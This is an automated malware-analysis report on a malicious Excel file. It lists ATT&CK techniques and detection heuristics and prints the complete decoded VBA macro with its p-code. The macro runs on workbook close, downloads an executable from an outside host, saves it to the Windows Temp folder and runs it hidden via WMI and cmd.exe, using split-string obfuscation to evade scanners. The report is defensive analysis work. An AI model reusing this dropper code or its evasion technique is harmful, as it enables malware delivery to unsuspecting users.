Verdict: MALICIOUS (risk score 262)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The VBA macro within the Excel file is designed to download a file from 'https://office-files.pw/Dd1239fghH/f.exe' and save it as 'C:\Windows\Temp\d.exe'. It then attempts to execute this downloaded file using 'cmd.exe' via the Win32_Process WMI object. The obfuscation techniques used, such as string concatenation for API names and URLs, indicate a deliberate attempt to evade detection.
Heuristics (7)

- VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- VBA downloads and writes a file to disk (critical) OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `output.write request.responseBody`
- Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  Matched line in script: `Set request = CreateObject("Mi" + q + "LHT" + "TP")`
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call.
  Matched line in script: `Set request = CreateObject("Mi" + q + "LHT" + "TP")`
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call.
  Matched line in script: `Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")`
- Payload URL assembled from a Chr()/Asc() string expression, 1 URL (high) OLE_VBA_EXPR_DROPPER_URL: A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: https://office-files.pw/Dd1239fghH/f.exe (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5285 bytes | 1ef8ae385ecc4ef8fe505ab9cf19721da4e6ac83ef8776c70a291b81552667bc |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim request
Dim q As String
q = "croso" + "ft.XM"
Set request = CreateObject("Mi" + q + "LHT" + "TP")
Dim t1 As String
t1 = "t"
Dim ff As String
ff = "pw/Dd1239fghH/f.e" + "xe"
request.Open "GET", "h" + "t" + "t" + "ps" + ":" + "/" + "/office" + "-files." + ff, False
request.Send
Dim sss As String
sss = "b" + "." + "Stream"
Set output = CreateObject("Ad" + "od" + sss)
Dim filename As String
filename = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\d" + "." + "exe"
output.Type = 1
output.Open
output.write request.responseBody
output.savetofile filename, 2
Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")
Dim path As String
path = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\"
Dim p1 As String
p1 = "/h" + "id"
Dim p2 As String
p2 = "/c " + "cd"
Result = process.Create("cm" + "d.e" + "xe " + p1 + " " + p2 + " " + path + " & " + " st" + "art d.e" + "xe", Null, Null, processid)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_gkgc70d0
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3256 bytes
' Line #0:
' FuncDefn (Sub Workbook_BeforeClose(Cancel As Boolean))
' Line #1:
' OnError (Resume Next)
' Line #2:
' Dim
' VarDefn request
' Line #3:
' Dim
' VarDefn q (As String)
' Line #4:
' LitStr 0x0005 "croso"
' LitStr 0x0005 "ft.XM"
' Add
' St q
' Line #5:
' SetStmt
' LitStr 0x0002 "Mi"
' Ld q
' Add
' LitStr 0x0003 "LHT"
' Add
' LitStr 0x0002 "TP"
' Add
' ArgsLd CreateObject 0x0001
' Set request
' Line #6:
' Dim
' VarDefn t1 (As String)
' Line #7:
' LitStr 0x0001 "t"
' St t1
' Line #8:
' Dim
' VarDefn ff (As String)
' Line #9:
' LitStr 0x0011 "pw/Dd1239fghH/f.e"
' LitStr 0x0002 "xe"
' Add
' St ff
' Line #10:
' LitStr 0x0003 "GET"
' LitStr 0x0001 "h"
' LitStr 0x0001 "t"
' Add
' LitStr 0x0001 "t"
' Add
' LitStr 0x0002 "ps"
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0001 "/"
' Add
' LitStr 0x0007 "/office"
' Add
' LitStr 0x0007 "-files."
' Add
' Ld ff
' Add
' LitVarSpecial (False)
' Ld request
' ArgsMemCall Open 0x0003
' Line #11:
' Ld request
' ArgsMemCall Send 0x0000
' Line #12:
' Dim
' VarDefn sss (As String)
' Line #13:
' LitStr 0x0001 "b"
' LitStr 0x0001 "."
' Add
' LitStr 0x0006 "Stream"
' Add
' St sss
' Line #14:
' SetStmt
' LitStr 0x0002 "Ad"
' LitStr 0x0002 "od"
' Add
' Ld sss
' Add
' ArgsLd CreateObject 0x0001
' Set Output
' Line #15:
' Dim
' VarDefn filename (As String)
' Line #16:
' LitStr 0x0001 "C"
' LitStr 0x0001 ":"
' Add
' LitStr 0x0003 "\Wi"
' Add
' LitStr 0x0003 "ndo"
' Add
' LitStr 0x0002 "ws"
' Add
' LitStr 0x0003 "\Te"
' Add
' LitStr 0x0004 "mp\d"
' Add
' LitStr 0x0001 "."
' Add
' LitStr 0x0003 "exe"
' Add
' St filename
' Line #17:
' LitDI2 0x0001
' Ld Output
' MemSt Type
' Line #18:
' Ld Output
' ArgsMemCall Open 0x0000
' Line #19:
' Ld request
' MemLd responseBody
' Ld Output
' ArgsMemCall Write 0x0001
' Line #20:
' Ld filename
' LitDI2 0x0002
' Ld Output
' ArgsMemCall savetofile 0x0002
' Line #21:
' SetStmt
' LitStr 0x0002 "wi"
' LitStr 0x0004 "nmgm"
' Add
' LitStr 0x0002 "ts"
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0001 "W"
' Add
' LitStr 0x0003 "in3"
' Add
' LitStr 0x0001 "2"
' Add
' LitStr 0x0001 "_"
' Add
' LitStr 0x0002 "Pr"
' Add
' LitStr 0x0003 "oce"
' Add
' LitStr 0x0002 "ss"
' Add
' ArgsLd GetObject 0x0001
' Set process
' Line #22:
' Dim
' VarDefn path (As String)
' Line #23:
' LitStr 0x0001 "C"
' LitStr 0x0001 ":"
' Add
' LitStr 0x0003 "\Wi"
' Add
' LitStr 0x0003 "ndo"
' Add
' LitStr 0x0002 "ws"
' Add
' LitStr 0x0003 "\Te"
' Add
' LitStr 0x0003 "mp\"
' Add
' St path
' Line #24:
' Dim
' VarDefn p1 (As String)
' Line #25:
' LitStr 0x0002 "/h"
' LitStr 0x0002 "id"
' Add
' St p1
' Line #26:
' Dim
' VarDefn p2 (As String)
' Line #27:
' LitStr 0x0003 "/c "
' LitStr 0x0002 "cd"
' Add
' St p2
' Line #28:
' LitStr 0x0002 "cm"
' LitStr 0x0003 "d.e"
' Add
' LitStr 0x0003 "xe "
' Add
' Ld p1
' Add
' LitStr 0x0001 " "
' Add
' Ld p2
' Add
' LitStr 0x0001 " "
' Add
' Ld path
' Add
' LitStr 0x0003 " & "
' Add
' LitStr 0x0003 " st"
' Add
' LitStr 0x0007 "art d.e"
' Add
' LitStr 0x0002 "xe"
' Add
' LitVarSpecial (Null)
' LitVarSpecial (Null)
' Ld processid
' Ld process
' ArgsMemLd Create 0x0004
' St Result
' Line #29:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 991 bytes
```